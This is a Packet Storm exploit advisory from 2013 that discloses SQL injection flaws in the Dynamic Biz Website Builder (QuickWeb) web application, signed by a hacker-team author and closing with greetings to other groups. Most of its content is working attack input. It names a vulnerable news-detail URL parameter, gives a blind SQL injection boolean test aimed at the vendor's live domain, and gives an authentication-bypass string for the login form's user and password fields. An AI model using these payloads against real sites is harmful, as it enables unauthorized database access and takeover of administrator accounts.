Dynamic Biz Website Builder SQL Injection

2013-12-16T00:00:00
ID PACKETSTORM:124451
Type packetstorm
Reporter R3d-D3v!L
Modified 2013-12-16T00:00:00

Description

                                        
                                            `  
  
  
  
  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
[~] Tybe: Multiple Vulnerabilities  
[~] Vendor: http://www.etoshop.com/  
[+] Software: Dynamic Biz Website Builder (QuickWeb)   
[+] infection: Multiple Vulnerabilities  
[~] Version :  
[~] author: R3d-D3v!L  
[+] TEAM: ABH   
[?] contact: X[at]hotmail.co.jp   
[-]   
[?] Date: 14.d3c.2ol3   
[?] T!ME: 04:54 am GMT   
[?] Home: abhsec.com  
[^]   
[?]  
=====================================================================================   
#Dynamic Biz Website Builder (QuickWeb)(MV) suffering from Multiple Vulnerabilities  
=====================================================================================  
  
  
[!] Exploit Already Tested ... on windows server 2008  
  
[^] Error console:- Blind sql injection  
  
dweb/apps/news-events/newdetail.asp?id=1' <--vuln -   
  
  
[?] proof of concept : 1  
  
www.etoshop.com/dweb/apps/news-events/newdetail.asp?id=1 and 1 =1 <--true--  
  
[?] proof of concept 2 authbypass :  
  
www.etoshop.com/dweb/login.asp  
  
(/) UserID : x' or ' 1=1--  
  
(\)Password : x' or ' 1=1--  
  
[~]-----------------------------{(A.B.H)}----------------------------------------------------  
#   
[~] Greetz tO:virus_jordan&&H@CK3R M!ND&SyrianooĦąĈkỉŋg&ĦǒĿǻkőẾŁếstorầ&NetikertyAsenet...etc ;  
#   
[~] 70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # ;  
#   
[~] special thanks :all soqor members & xp10 # ;  
#   
[?] special SupPoRT : packet storm & 1337day & Maksymilian Arciemowicz # ;  
#   
[?]---> ((R3d D3v!L<---palestine phoneix--->JUPA<---aNd--->Devil ro0t)) #;   
#   
[~]spechial FR!ND: they all are spechials ;) #;   
#   
[~] !'M 4R48!4N 3XPL0!73R. #;   
#   
[~](>D!R 4ll 0R D!E<) #;   
#   
[~]---------------------------------------------------------------------------------------------   
  
  
  
  
  
  
  
  
  
  
  
`